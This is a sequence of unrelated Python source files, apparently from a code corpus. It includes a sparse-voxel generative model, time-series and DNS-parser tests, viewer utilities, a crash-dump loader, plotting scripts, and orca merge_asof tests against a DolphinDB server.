        ("option2", "aaa"),
        ("option1", "222"),  # overwrites the earlier option1 value
        ("option3", "213"),
    ]
    config.add_option_value_pairs(
        section_option_value_pairs, section="Section1"
    )
    option_value_pairs = [("option5", "333"), ("option6", "555")]
    config.add_option_value_pairs(option_value_pairs)
    config.log_option_value_pairs()
    config.write_state_to_disc()
    some_number = config.get_option_value("option1", int, section="Section1")
    logger.info(some_number)
    logger.info(some_number + 3)
    some_number = config.get_option_value("option5", int)
    logger.info(some_number)
    logger.info(some_number + 3)
|
1690549
|
import torch
import MinkowskiEngine as ME
from torch.utils.tensorboard import SummaryWriter
from typing import List
from collections import defaultdict
from models.transition_model import TransitionModel
from utils.pad import unpack, get_gt_values
from utils.util import timeit, downsample
from utils.scheduler import InfusionScheduler
from utils.phase import Phase
from MinkowskiEngine import SparseTensor
from utils.visualization import (
vis_2d_coords, tensors2dist_func_tensor_imgs, tensors2tensor_imgs
)
from utils.marching_cube import marching_cubes_sparse_voxel
class GCA(TransitionModel):
    """Generative cellular automata over sparse voxel grids.

    Trains a sparse-convolution backbone to predict, per candidate voxel,
    the probability of occupancy in the next state; training uses infusion
    (mixing sampled predictions with ground truth at a scheduled rate).
    """
    name = 'gca'
    def __init__(self, config, writer: SummaryWriter):
        TransitionModel.__init__(self, config, writer)
        # Schedules per-phase ground-truth infusion rates.
        self.infusion_scheduler = InfusionScheduler(config)
        self.bce_loss = torch.nn.BCEWithLogitsLoss()
    @timeit
    def forward(self, x):
        '''
        Forward pass through sparse convolution network
        and unpack the output
        input:
            x: SparseTensor of
                coordinates with shape N x 3
                features with shape N x 1
        output:
            x_hat: SparseTensor of
                coordinates with shape M x 3
                features with shape M x k (parameter outputs)
        '''
        out_packed = self.backbone(x)
        # Expand packed predictions to one entry per neighborhood shift.
        out_unpacked = unpack(out_packed, self.shifts[:, 1:], self.out_dim)
        return out_unpacked
    @timeit
    def learn(
            self, data: dict,
            step: float, mode: str = 'train'
    ) -> (dict, float):
        """
        :param data: dict containing key, value pairs of
                - state_coord: Tensor containing coordinates of input voxels
                - state_feat: Tensor containing features of input voxels
                - query_point: Tensor of B x N x data_dim
                - dist: Tensor of B x N x data_dim
                - phase: List of phases for each data
        :param step: training step
        :param mode: mode of training
        :return:
                - next_step: dict containing same keys and values as parameter data
                - loss: float of the current step's lose
        """
        # Current state s: occupied voxels with constant feature 1.
        s_coords = ME.utils.batched_coordinates(data['state_coord'])
        s_feats = torch.ones(s_coords.shape[0], 1)
        s = SparseTensor(
            features=s_feats,
            coordinates=s_coords,
            device=self.device,
        )
        # Target state y (ground-truth embedding coordinates).
        y_coords = ME.utils.batched_coordinates(data['embedding_coord'])
        y_feats = torch.ones(y_coords.shape[0], 1)
        y = SparseTensor(
            features=y_feats,
            coordinates=y_coords,
            device=self.device,
        )
        # forward pass
        s_hat = self.forward(s)
        # compute loss
        losses = []
        # one_hot_gt: per-batch occupancy target aligned with s_hat's coords.
        one_hot_gt, y_pad_coords = get_gt_values(s_hat, y)
        phases = data['phase']
        batch_size = len(phases)
        feats = self.sample_feat(s_hat.F)
        infusion_rates = self.infusion_scheduler.sample(phases)
        s_next_feats = []
        s_next_coords = []
        for batch_idx, (infusion_rate, phase) in enumerate(zip(infusion_rates, phases)):
            # compute loss
            idx = s_hat.C[:, 0] == batch_idx
            s_hat_feat = s_hat.F[idx, :]
            losses.append(self.bce_loss(s_hat_feat.squeeze(1), one_hot_gt[batch_idx].float()))
            # infusion training: with prob. infusion_rate, replace the sampled
            # occupancy with the ground-truth one before forming the next state.
            feat = feats[idx]
            coord = s_hat.C[idx, :]
            infusion_idx = (torch.rand(feat.shape[0]) < infusion_rate)
            s_next_feat = torch.where(
                infusion_idx, one_hot_gt[batch_idx].float().cpu(), feat.cpu()
            )
            s_next_coords.append(coord[s_next_feat.bool(), 1:].cpu())
            s_next_feats.append(torch.ones(s_next_coords[batch_idx].shape[0], 1).cpu())
            # update_phases
            phases[batch_idx] = phase + 1
            # Fraction of target voxels currently matched by the prediction.
            completion_rate = one_hot_gt[batch_idx].sum().item() \
                              / float((y.C[:, 0] == batch_idx).sum().item())
            if completion_rate >= self.config['completion_rate']:
                if not phase.equilibrium_mode:
                    phase.set_complete()
                    self.list_summaries['completion_phase/{}'.format(mode)] += [phase.phase]
            elif (phase.phase > self.config['max_phase']) and (mode == 'train'):
                # Ran out of phases without reaching completion.
                incomplete_key = 'phase/incomplete_cnt'
                self.scalar_summaries[incomplete_key] = [self.scalar_summaries[incomplete_key][0] + 1] if \
                    len(self.scalar_summaries[incomplete_key]) != 0 else [1]
        loss = torch.stack(losses).mean()
        data['state_coord'] = s_next_coords
        # write summaries
        self.scalar_summaries['loss/{}/total'.format(mode)] += [loss.item()]
        self.list_summaries['loss/{}/total_histogram'.format(mode)] += torch.stack(losses).cpu().tolist()
        self.scalar_summaries['num_points/input'] += [(s.C[:, 0] == i).sum().item() for i in range(batch_size)]
        self.scalar_summaries['num_points/output'] += [one_hot_gt[i].shape[0] for i in range(batch_size)]
        self.list_summaries['scheduler/infusion_rates'] += infusion_rates
        if mode != 'train':
            # Evaluation: no parameter update.
            return loss.detach().cpu().item(), data
        # take gradient descent
        self.zero_grad()
        loss.backward()
        self.clip_grad()
        self.optimizer.step()
        self.lr_scheduler.step()
        return loss.detach().cpu().item(), data
    def transition(self, s: SparseTensor, sigma=None) -> SparseTensor:
        """Sample the next sparse state from the model given state ``s``.

        ``sigma`` is currently unused. Guarantees a non-empty coordinate
        set per batch by inserting a dummy origin voxel when needed.
        """
        y_hat = self.forward(s)
        feat_sample = self.sample_feat(y_hat.F)
        s_next_coord = y_hat.C[feat_sample.bool(), :]
        # if the sampled output contains no coords
        batch_size = s.C[:, 0].max().item() + 1
        for batch_idx in range(batch_size):
            if (s_next_coord[:, 0] == batch_idx).shape[0] == 0:
                if s_next_coord[:, 0].shape[0] == 0:
                    s_next_coord = torch.zeros(1, 4).int().to(s_next_coord.device)
                else:
                    s_next_coord = torch.stack([
                        s_next_coord,
                        torch.tensor([[batch_idx] + [0, ] * self.config['data_dim']]).int().to(s_next_coord.device)
                    ], dim=0)
        s_next_feat = torch.ones(s_next_coord.shape[0], 1)
        try:
            s_next = SparseTensor(
                s_next_feat, s_next_coord,
                device=self.device
            )
        except RuntimeError:
            # NOTE(review): debugging hook left in — drops into pdb when
            # SparseTensor construction fails; consider removing for prod.
            breakpoint()
        return s_next
    def vis_collated_imgs(self, dataset, vis_indices: List, step: int):
        """Render input / rollout / ground-truth images and log as videos.

        Runs the model autoregressively for max_eval_phase steps on the
        given dataset indices and writes one video per sample to the
        summary writer. Restores the previous train/eval mode on exit.
        """
        training = self.training
        self.eval()
        img_config = self.config['vis']['vis_collated_imgs']
        img_2d_config = img_config['vis_2d']
        img_3d_config = img_config['vis_3d']
        vis_batch_size = self.config['vis_batch_size']
        mini_batches = [
            vis_indices[i: i + vis_batch_size]
            for i in range(0, len(vis_indices), vis_batch_size)
        ]
        for mini_batch_idxs in mini_batches:
            batch = [dataset[batch_idx] for batch_idx in mini_batch_idxs]
            batch_size = len(batch)
            batch = dataset.collate_fn(batch)
            state_coords = batch['state_coord']
            state_feats = batch['state_feat']
            embedding_coords = batch['embedding_coord']
            file_names = batch['file_name']
            num_phases = self.config['max_eval_phase']
            s = SparseTensor(
                features=torch.cat(state_feats),
                coordinates=ME.utils.batched_coordinates(state_coords),
                device=self.device,
            )
            # Pick the renderer matching the data dimensionality.
            if self.data_dim == 2:
                img_fn = vis_2d_coords
            elif self.data_dim == 3:
                img_fn = tensors2dist_func_tensor_imgs
            else:
                raise ValueError('data dim {} not allowed'.format(self.data_dim))
            # input
            input_coords = [
                s.C[s.C[:, 0] == batch_idx, 1:]
                for batch_idx in range(batch_size)
            ]
            input_imgs = img_fn(input_coords, img_2d_config)
            input_3d_imgs = tensors2tensor_imgs(input_coords, self.data_dim, img_3d_config, batch_size)
            # ground truth
            gt_coords = [
                embedding_coords[batch_idx].detach().cpu()
                for batch_idx in range(batch_size)
            ]
            gt_imgs = img_fn(gt_coords, img_2d_config)
            gt_3d_imgs = tensors2tensor_imgs(gt_coords, self.data_dim, img_3d_config, batch_size)
            output_imgs, output_3d_imgs, output_3d_imgs_batch = [], [], []
            phase = Phase(
                self.config['max_phase'],
                self.config['equilibrium_max_phase']
            )
            # Autoregressive rollout: feed each sampled state back in.
            for phase_cnt in range(num_phases):
                with torch.no_grad():
                    s_next = self.transition(s)
                s = s_next
                phase += 1
                # transition output
                output_coords = [
                    s.C[s.C[:, 0] == batch_idx, 1:]
                    for batch_idx in range(batch_size)
                ]
                output_imgs.append(img_fn(output_coords, img_2d_config))
                output_3d_imgs.append(
                    tensors2tensor_imgs(output_coords, self.data_dim, img_3d_config, batch_size)
                )
            for batch_idx in range(batch_size):
                output_imgs_batch = torch.stack([
                    output_imgs[phase][batch_idx]
                    for phase in range(num_phases)
                ], dim=0)
                output_3d_imgs_batch = torch.stack([
                    output_3d_imgs[phase][batch_idx]
                    for phase in range(num_phases)
                ], dim=0)
                # Video layout: input | rollout | ground truth (2D then 3D),
                # with static panels repeated to match the rollout length.
                self.writer.add_video(
                    '{}-img-{}'.format(dataset.mode, file_names[batch_idx]),
                    torch.cat([
                        input_imgs[batch_idx].unsqueeze(0).repeat_interleave(num_phases, dim=0),
                        output_imgs_batch,
                        gt_imgs[batch_idx].unsqueeze(0).repeat_interleave(num_phases, dim=0),
                        input_3d_imgs[batch_idx].unsqueeze(0).repeat_interleave(num_phases, dim=0),
                        output_3d_imgs_batch,
                        gt_3d_imgs[batch_idx].unsqueeze(0).repeat_interleave(num_phases, dim=0),
                    ], dim=3).unsqueeze(0), global_step=step
                )
        self.train(training)
    def evaluate(self, data, step, dataset_mode) -> float:
        """Average the infusion-mode loss over max_eval_phase transitions."""
        max_eval_phase = self.config['max_eval_phase']
        losses = []
        for mode in ['eval_infusion']:
            data_next = data
            for p in range(max_eval_phase):
                loss, data_next = self.learn(data_next, step, mode=mode)
                losses.append(loss)
        return sum(losses) / float(len(losses))
    def get_pointcloud(self, s: SparseTensor, sample_nums: List, return_mesh=True):
        """Mesh each batch item via marching cubes and sample point clouds.

        Returns dict {sample_num: [point clouds]} and, when return_mesh,
        also dict {'initial_mesh': [meshes]}. Empty states fall back to
        zero point clouds.
        """
        ret = defaultdict(list)
        meshes = defaultdict(list)
        for batch_idx in range(s.C[:, 0].max().item() + 1):
            idx = s.C[:, 0] == batch_idx
            coord = s.C[idx, 1:]
            mesh = marching_cubes_sparse_voxel(coord, voxel_size=self.voxel_size)
            meshes['initial_mesh'] += [mesh]
            # if sample_num == 2048:
            #     ret[sample_num] += [downsample(coord * self.voxel_size, sample_num)]
            # else:
            for sample_num in sample_nums:
                try:
                    ret[sample_num] += [torch.tensor(mesh.sample(sample_num)).float()]
                except IndexError:
                    ret[sample_num] += [torch.zeros(sample_num, 3)]  # for empty state
        if return_mesh:
            return ret, meshes
        return ret
|
1690668
|
import datetime
import nose
from traces import TimeSeries, Histogram
def test_distribution():
    """Alternating 0/1 series over four days splits time evenly."""
    start = datetime.datetime(2015, 3, 1)
    # v. simple
    a = TimeSeries()
    a.set(start, 1)
    a.set(datetime.datetime(2015, 3, 2), 0)
    a.set(datetime.datetime(2015, 3, 3), 1)
    a.set(datetime.datetime(2015, 3, 4), 0)
    end = datetime.datetime(2015, 3, 5)
    # not normalized
    distribution = a.distribution(
        start=start, end=end, normalized=False,
    )
    assert distribution[0] == 24 * 60 * 60 * 2  # two days
    assert distribution[1] == 24 * 60 * 60 * 2
    # normalized
    distribution = a.distribution(start=start, end=end)
    assert distribution[0] == 0.5
    assert distribution[1] == 0.5
def test_default_values():
    """Without start/end, distribution() spans first to last measurement."""
    # v. simple
    a = TimeSeries()
    a.set(datetime.datetime(2015, 3, 1), 1)
    a.set(datetime.datetime(2015, 3, 2), 0)
    a.set(datetime.datetime(2015, 3, 3), 1)
    a.set(datetime.datetime(2015, 3, 4), 0)
    start = datetime.datetime(2015, 3, 1)
    end = datetime.datetime(2015, 3, 4)
    default = a.distribution()
    distribution = a.distribution(start=start, end=end)
    # Defaults must equal explicitly passing the series' own bounds.
    assert default == distribution
    assert distribution[0] == 1.0 / 3
    assert distribution[1] == 2.0 / 3
def test_mask():
    """Only time where the mask series is truthy counts in the distribution."""
    start = datetime.datetime(2015, 3, 1)
    # v. simple
    a = TimeSeries()
    a.set(start, 1)
    a.set(datetime.datetime(2015, 4, 2), 0)
    a.set(datetime.datetime(2015, 4, 3), 1)
    a.set(datetime.datetime(2015, 4, 4), 0)
    end = datetime.datetime(2015, 4, 5)
    # Mask covers only April 1-3.
    mask = TimeSeries(default=False)
    mask[datetime.datetime(2015, 4, 1)] = True
    mask[datetime.datetime(2015, 4, 3)] = False
    # not normalized
    distribution = a.distribution(
        start=start, end=end, normalized=False, mask=mask,
    )
    assert distribution[0] == 24 * 60 * 60  # one day
    assert distribution[1] == 24 * 60 * 60
    # normalized
    distribution = a.distribution(
        start=start, end=end, mask=mask,
    )
    assert distribution[0] == 0.5
    assert distribution[1] == 0.5
def test_integer_times():
    """distribution() also accepts plain integer time stamps."""
    series = TimeSeries()
    series[0] = 1
    series[1] = 0
    series[3] = 1
    series[4] = 0
    dist = series.distribution(start=0, end=6)
    # value 1 holds on [0,1) and [3,4): 2 of 6 units; value 0 the rest.
    assert dist[0] == 2.0 / 3
    assert dist[1] == 1.0 / 3
def test_distribution_set():
    """Series with set-valued measurements (currently only constructs it)."""
    time_series = TimeSeries()
    time_series[1.2] = {'broccoli'}
    time_series[1.4] = {'broccoli', 'orange'}
    time_series[1.7] = {'broccoli', 'orange', 'banana'}
    time_series[2.2] = {'orange', 'banana'}
    time_series[3.5] = {'orange', 'banana', 'beets'}
    # TODO: How to convert the set into multiple ts?
def test_distribution_empty():
    """Behaviour of distribution() on empty series, with and without default."""
    ts = TimeSeries()
    mask = TimeSeries(default=0)
    mask[0] = 1
    mask[2] = 0
    # distribution with default args and no default value on empty
    # TimeSeries doesn't know what to do
    nose.tools.assert_raises(KeyError, ts.distribution)
    # distribution with start and end, but no default value on empty
    # TimeSeries doesn't know what to do
    assert ts.distribution(0, 10) == Histogram.from_dict({None: 1.0})
    # no matter what is passed in to distribution, if the default
    # value is not set on an empty TimeSeries this should be an error
    # NOTE(review): the next line discards its comparison result — probably
    # missing an `assert` (or should be the commented assert_raises below);
    # confirm intended behaviour before changing.
    ts.distribution(mask=mask) == Histogram.from_dict({None: 1.0})
    # nose.tools.assert_raises(KeyError, ts.distribution, mask=mask)
    ts = TimeSeries(default=0)
    # no mask or start/end on empty TimeSeries, don't know what to do
    nose.tools.assert_raises(KeyError, ts.distribution)
    # start and end or mask given, is fine
    distribution = ts.distribution(0, 10)
    assert distribution[0] == 1.0
    distribution = ts.distribution(mask=mask)
    assert distribution[0] == 1.0
    # empty mask
    mask = TimeSeries(default=0)
    with nose.tools.assert_raises(ValueError):
        ts.distribution(mask=mask)
    with nose.tools.assert_raises(ValueError):
        ts.distribution(start=0, end=2, mask=mask)
def test_none_handling():
    """Tuple values containing None are treated as ordinary hashable values."""
    ts = TimeSeries()
    ts[1] = (0, 1)
    ts[2] = (None, 0)
    ts[3] = (2, 0)
    # print(ts.distribution(normalized=False))
    assert(ts.distribution()[(0, 1)] == 0.5)
    assert(ts.distribution()[(None, 0)] == 0.5)
|
1690695
|
from .pydbg import DebuggerBase, DbgEng
class CrashDbg(DebuggerBase):
    """Standalone DbgEng-based debugger for post-mortem crash-dump analysis."""
    def __init__(self):
        # client=None with standalone=True — presumably the base class
        # creates its own DbgEng client; confirm against DebuggerBase.
        super().__init__(client=None, standalone=True)
    def load_dump(self, name):
        """Open the dump file ``name`` and resume so the engine processes it."""
        self._client.OpenDumpFile(name)
        self.go()
|
1690708
|
import numpy as np
import matplotlib.pyplot as plt
# ========== HW04 SOLUTION [Python2] ========== #
# NOTE: print is written in call form, which is valid in both Python 2
# (single argument) and Python 3.

# ========== 1 ========== #
# Index of the minimum element in the flattened 5-D array.
five_dim_array = np.load('five_dim_array.npy')
array_flat = five_dim_array.flatten()
print(array_flat.argmin())
# ========== 2 ========== #
# Plot four reference functions on [-10, 10] with LaTeX legend labels.
x = np.linspace(-10, 10)
plt.figure()
plt.plot(x, 1 / x, label=r'$f(x) = \frac{1}{x}$')
plt.plot(x, x, label=r'$g(x) = x$')
plt.plot(x, x ** 2, label=r'$h(x) = x^2$')
plt.plot(x, x ** 3, label=r'$k(x) = x^3$')
plt.legend()
plt.show()
# ========== 3 ========== #
# Quadratic with additive Gaussian noise (sigma = 5) vs. the clean curve.
x = np.linspace(-1, 4, num=50)
y = 3.7 * x ** 2 - 7.0 * x + 3.1
noise = np.random.normal(0, 5, size=50)
plt.figure()
plt.plot(x, y + noise, label=r'$f(x) = 3.72x^2-7.0x+3.1 + \epsilon$')
plt.plot(x, y, label=r'$f(x) = 3.72x^2-7.0x+3.1$')
plt.grid(True)
plt.xlabel('x')
plt.ylabel('f(x)')
plt.show()
|
1690721
|
import json
from math import exp
from matplotlib import pyplot as plt
if __name__ == "__main__":
    # Load primitives indexed by their label for id lookups below.
    # Assumes primitives.json is a list of objects with 'label' and 'id'
    # keys, and results.json matches them by 'id' — TODO confirm schema.
    with open("primitives.json", "r") as f:
        primitives = {x['label']:x for x in json.load(f)}
    with open("results.json", "r") as f:
        results = json.load(f)["results"]
    ys_precip = [r['intervened']['value']['value'] for r in results if r['id'] == primitives['UN/events/weather/precipitation']['id']]
    ys_fp = [r['intervened']['value']['value'] for r in results if r['id'] == primitives['UN/events/human/agriculture/food_production']['id']]
    tau=1.0
    # Analytic decaying derivative curve plotted alongside the data.
    ys_derivs = [-0.6*exp(-tau*i) for i in range(len(ys_precip))]
    xs = range(len(ys_precip))
    plt.style.use('ggplot')
    plt.plot(xs, ys_precip, label="precipitation")
    plt.plot(xs, ys_fp, label="food_production")
    plt.plot(xs, ys_derivs, label="∂(precipitation)/∂t")
    plt.legend()
    plt.savefig('experiment_timeseries.png')
|
1690754
|
from __future__ import absolute_import
from __future__ import print_function
from .products import load_product_yaml
from .yaml import open_raw
def open_environment(build_config_yaml_path, product_yaml_path):
    """Merge the build-config YAML and the product YAML into one dict.

    Product values win over build-config values on key collisions,
    because they are applied last via dict.update().
    """
    environment = open_raw(build_config_yaml_path)
    product = load_product_yaml(product_yaml_path)
    environment.update(product)
    return environment
|
1690832
|
import meshcat
import numpy as np
import pinocchio as pin
# Meshcat utils
def meshcat_material(r, g, b, a):
    """Build a meshcat Phong material from RGBA components in [0, 1].

    The color is packed into a single 0xRRGGBB integer as meshcat expects.
    (Removed a redundant function-local ``import meshcat``; the module is
    already imported at file level.)
    """
    material = meshcat.geometry.MeshPhongMaterial()
    material.color = int(r * 255) * 256 ** 2 + int(g * 255) * 256 + int(b * 255)
    material.opacity = a
    return material
def meshcat_transform(x, y, z, q, u, a, t):
    # Convert position + quaternion to a 4x4 homogeneous transform matrix
    # via pinocchio. q, u, a, t are the quaternion components in the order
    # pin.XYZQUATToSE3 expects — presumably (x, y, z, w); confirm.
    return np.array(pin.XYZQUATToSE3([x, y, z, q, u, a, t]))
# Gepetto/meshcat abstraction
def addViewerBox(viz, name, sizex, sizey, sizez, rgba):
    """Add a colored box called *name* to a Meshcat or Gepetto viewer."""
    if isinstance(viz, pin.visualize.MeshcatVisualizer):
        geometry = meshcat.geometry.Box([sizex, sizey, sizez])
        viz.viewer[name].set_object(geometry, meshcat_material(*rgba))
        return
    if isinstance(viz, pin.visualize.GepettoVisualizer):
        viz.viewer.gui.addBox(name, sizex, sizey, sizez, rgba)
        return
    raise AttributeError("Viewer %s is not supported." % viz.__class__)
def addViewerSphere(viz, name, size, rgba):
    """Add a colored sphere called *name* to a Meshcat or Gepetto viewer."""
    if isinstance(viz, pin.visualize.MeshcatVisualizer):
        geometry = meshcat.geometry.Sphere(size)
        viz.viewer[name].set_object(geometry, meshcat_material(*rgba))
        return
    if isinstance(viz, pin.visualize.GepettoVisualizer):
        viz.viewer.gui.addSphere(name, size, rgba)
        return
    raise AttributeError("Viewer %s is not supported." % viz.__class__)
def applyViewerConfiguration(viz, name, xyzquat):
    """Place object *name* at the pose given by *xyzquat* (x, y, z + quaternion)."""
    if isinstance(viz, pin.visualize.MeshcatVisualizer):
        viz.viewer[name].set_transform(meshcat_transform(*xyzquat))
        return
    if isinstance(viz, pin.visualize.GepettoVisualizer):
        viz.viewer.gui.applyConfiguration(name, xyzquat)
        viz.viewer.gui.refresh()
        return
    raise AttributeError("Viewer %s is not supported." % viz.__class__)
'''
viz.viewer['world/ball'].set_object(meshcat.geometry.Sphere(.1),
meshcat_material(.2, .2, 1., .5))
viz.viewer['world/box'].set_transform(meshcat_transform(.5, .2, .2, 1, 0, 0, 0))
viz.viewer['world/ball'].set_transform(meshcat_transform(-.5, .2, .2, 1, 0, 0, 0))
'''
|
1690855
|
import datetime
import pathlib
import unittest
from freenom_dns_updater import Record, RecordType
from freenom_dns_updater.record_parser import RecordParser
class DomainParserTest(unittest.TestCase):
    """Parsing tests for the Freenom DNS record page."""

    def test_parse_records(self):
        # Parse the bundled HTML fixture and check the known AAAA record.
        resource = pathlib.Path(__file__).parent / "resources" / "record_page.html"
        records = RecordParser.parse(resource.read_text())
        self.assertEqual(2, len(records))
        wanted = Record()
        wanted.target = "fc00:db20:35b:7399::5:8888"
        wanted.ttl = 800
        wanted.name = "IPV6"
        wanted.type = RecordType.AAAA
        self.assertIn(wanted, records)
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
1690869
|
import unittest
import orca
import os.path as path
from setup.settings import *
from pandas.util.testing import *
def _create_odf_csv(datal, datar):
    """Create the dfs://testMergeAsofDB database and load both CSVs into it.

    ``datal``/``datar`` are forward-slash paths to the left (tickers) and
    right (values) CSV files; the script below builds a VALUE-partitioned
    database and bulk-loads each file with an adjusted text schema.
    """
    dfsDatabase = "dfs://testMergeAsofDB"
    s = orca.default_session()
    # NOTE(review): the login uses a placeholder password -- confirm the
    # credentials expected by the test DolphinDB server.
    dolphindb_script = """
    login('admin', '<PASSWORD>')
    if(existsDatabase('{dbPath}'))
    dropDatabase('{dbPath}')
    db=database('{dbPath}', VALUE, 2010.01M..2010.05M)
    stb1=extractTextSchema('{data1}')
    update stb1 set type="SYMBOL" where name="type"
    stb2=extractTextSchema('{data2}')
    update stb2 set type="SYMBOL" where name="ticker"
    loadTextEx(db,`tickers,`date, '{data1}',,stb1)
    loadTextEx(db,`values,`date, '{data2}',,stb2)
    """.format(dbPath=dfsDatabase, data1=datal, data2=datar)
    s.run(dolphindb_script)
class Csv:
    """Module-level cache of frames loaded once in DfsMergeTest.setUpClass."""
    # orca (DolphinDB-backed) frames
    odfs_csv_left = None
    odfs_csv_right = None
    # pandas reference frames
    pdf_csv_left = None
    pdf_csv_right = None
class DfsMergeTest(unittest.TestCase):
    """Compare orca.merge_asof against pandas.merge_asof on DFS tables.

    Exercises the `on` / `left_on`+`right_on` / index / `by` / `suffixes`
    parameter combinations; assertions hitting known orca defects are kept
    commented out and tagged ``TODO:ORCA``.
    """
    @classmethod
    def setUpClass(cls):
        # configure data directory
        DATA_DIR = path.abspath(path.join(__file__, "../setup/data"))
        left_fileName = 'test_merge_asof_left_table.csv'
        right_fileName = 'test_merge_asof_right_table.csv'
        # Fix: use the `path` alias (os.path) consistently -- this module only
        # does `import os.path as path`, so the bare name `os` is not bound
        # here (it previously only worked via a wildcard import side effect).
        datal = path.join(DATA_DIR, left_fileName)
        datal = datal.replace('\\', '/')
        datar = path.join(DATA_DIR, right_fileName)
        datar = datar.replace('\\', '/')
        dfsDatabase = "dfs://testMergeAsofDB"
        # connect to a DolphinDB server
        orca.connect(HOST, PORT, "admin", "123456")
        _create_odf_csv(datal, datar)
        # import both sides from DFS (orca) and from CSV (pandas reference)
        Csv.odfs_csv_left = orca.read_table(dfsDatabase, 'tickers')
        Csv.pdf_csv_left = pd.read_csv(datal, parse_dates=[0])
        Csv.odfs_csv_right = orca.read_table(dfsDatabase, 'values')
        Csv.pdf_csv_right = pd.read_csv(datar, parse_dates=[0])
    # --- cached frames and their date-indexed / bid-sorted variants ---
    @property
    def odfs_csv_left(self):
        return Csv.odfs_csv_left
    @property
    def odfs_csv_right(self):
        return Csv.odfs_csv_right
    @property
    def pdf_csv_left(self):
        return Csv.pdf_csv_left
    @property
    def pdf_csv_right(self):
        return Csv.pdf_csv_right
    @property
    def odfs_csv_left_index(self):
        return Csv.odfs_csv_left.set_index("date")
    @property
    def odfs_csv_right_index(self):
        return Csv.odfs_csv_right.set_index("date")
    @property
    def pdf_csv_left_index(self):
        return Csv.pdf_csv_left.set_index("date")
    @property
    def pdf_csv_right_index(self):
        return Csv.pdf_csv_right.set_index("date")
    @property
    def odfs_bid_csv_left(self):
        return self.odfs_csv_left.sort_values(by=['bid', 'date']).reset_index(drop=True)
    @property
    def odfs_bid_csv_right(self):
        return self.odfs_csv_right.sort_values(by=['bid', 'date']).reset_index(drop=True)
    @property
    def pdf_bid_csv_left(self):
        return self.pdf_csv_left.sort_values(by=['bid', 'date']).reset_index(drop=True)
    @property
    def pdf_bid_csv_right(self):
        return self.pdf_csv_right.sort_values(by=['bid', 'date']).reset_index(drop=True)
    @property
    def odfs_bid_csv_left_index(self):
        return self.odfs_csv_left.sort_values(by=['bid', 'date']).set_index('bid')
    @property
    def odfs_bid_csv_right_index(self):
        return self.odfs_csv_right.sort_values(by=['bid', 'date']).set_index('bid')
    @property
    def pdf_bid_csv_left_index(self):
        return self.pdf_csv_left.sort_values(by=['bid', 'date']).set_index('bid')
    @property
    def pdf_bid_csv_right_index(self):
        return self.pdf_csv_right.sort_values(by=['bid', 'date']).set_index('bid')
    def test_assert_original_dataframe_equal(self):
        assert_frame_equal(self.odfs_csv_left.to_pandas(), self.pdf_csv_left, check_dtype=False)
        assert_frame_equal(self.odfs_csv_right.to_pandas(), self.pdf_csv_right, check_dtype=False)
        assert_frame_equal(self.odfs_csv_left_index.to_pandas(), self.pdf_csv_left_index, check_dtype=False)
        assert_frame_equal(self.odfs_csv_right_index.to_pandas(), self.pdf_csv_right_index, check_dtype=False)
        assert_frame_equal(self.odfs_bid_csv_left.to_pandas(), self.pdf_bid_csv_left, check_dtype=False)
        assert_frame_equal(self.odfs_bid_csv_right.to_pandas(), self.pdf_bid_csv_right, check_dtype=False)
        assert_frame_equal(self.odfs_bid_csv_left_index.to_pandas(), self.pdf_bid_csv_left_index, check_dtype=False)
        assert_frame_equal(self.odfs_bid_csv_right_index.to_pandas(), self.pdf_bid_csv_right_index, check_dtype=False)
    def test_merge_asof_from_dfs_param_on(self):
        pdf = pd.merge_asof(self.pdf_csv_left, self.pdf_csv_right, on='date')
        odf = orca.merge_asof(self.odfs_csv_left, self.odfs_csv_right, on='date')
        assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
        pdf = pd.merge_asof(self.pdf_bid_csv_left, self.pdf_bid_csv_right, on='bid')
        odf = orca.merge_asof(self.odfs_bid_csv_left, self.odfs_bid_csv_right, on='bid')
        assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
    def test_merge_asof_from_dfs_param_leftonrighton(self):
        pdf = pd.merge_asof(self.pdf_csv_left, self.pdf_csv_right, left_on='date', right_on='date')
        odf = orca.merge_asof(self.odfs_csv_left, self.odfs_csv_right, left_on='date', right_on='date')
        assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
        pdf = pd.merge_asof(self.pdf_bid_csv_left, self.pdf_bid_csv_right, left_on='bid', right_on='bid')
        odf = orca.merge_asof(self.odfs_bid_csv_left, self.odfs_bid_csv_right, left_on='bid', right_on='bid')
        assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
    def test_merge_asof_from_dfs_param_index(self):
        pdf = pd.merge_asof(self.pdf_csv_left_index, self.pdf_csv_right_index, left_index=True, right_index=True)
        odf = orca.merge_asof(self.odfs_csv_left_index, self.odfs_csv_right_index, left_index=True, right_index=True)
        assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
        pdf = pd.merge_asof(self.pdf_bid_csv_left_index, self.pdf_bid_csv_right_index, left_index=True, right_index=True)
        odf = orca.merge_asof(self.odfs_bid_csv_left_index, self.odfs_bid_csv_right_index, left_index=True, right_index=True)
        assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
    def test_merge_asof_from_dfs_param_by(self):
        pdf = pd.merge_asof(self.pdf_csv_left, self.pdf_csv_right, on='date', by='ticker')
        odf = orca.merge_asof(self.odfs_csv_left, self.odfs_csv_right, on='date', by='ticker')
        # TODO:ORCA by bug
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
        pdf = pd.merge_asof(self.pdf_bid_csv_left, self.pdf_bid_csv_right, on='bid', by='ticker')
        odf = orca.merge_asof(self.odfs_bid_csv_left, self.odfs_bid_csv_right, on='bid', by='ticker')
        # TODO:ORCA by bug
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False, check_like=False)
    def test_merge_asof_from_dfs_param_leftbyrightby(self):
        pdf = pd.merge_asof(self.pdf_csv_left, self.pdf_csv_right, on='date', left_by='ticker', right_by='ticker')
        # TODO:ORCA by bug
        # odf = orca.merge_asof(self.odfs_csv_left, self.odfs_csv_right, on='date', left_by='ticker', right_by='ticker')
        # TODO:ORCA by bug
        # assert_frame_equal(odf.to_pandas().fillna(""), pdf.fillna(""), check_dtype=False)
        pdf = pd.merge_asof(self.pdf_bid_csv_left, self.pdf_bid_csv_right, on='bid', left_by='ticker',
                            right_by='ticker')
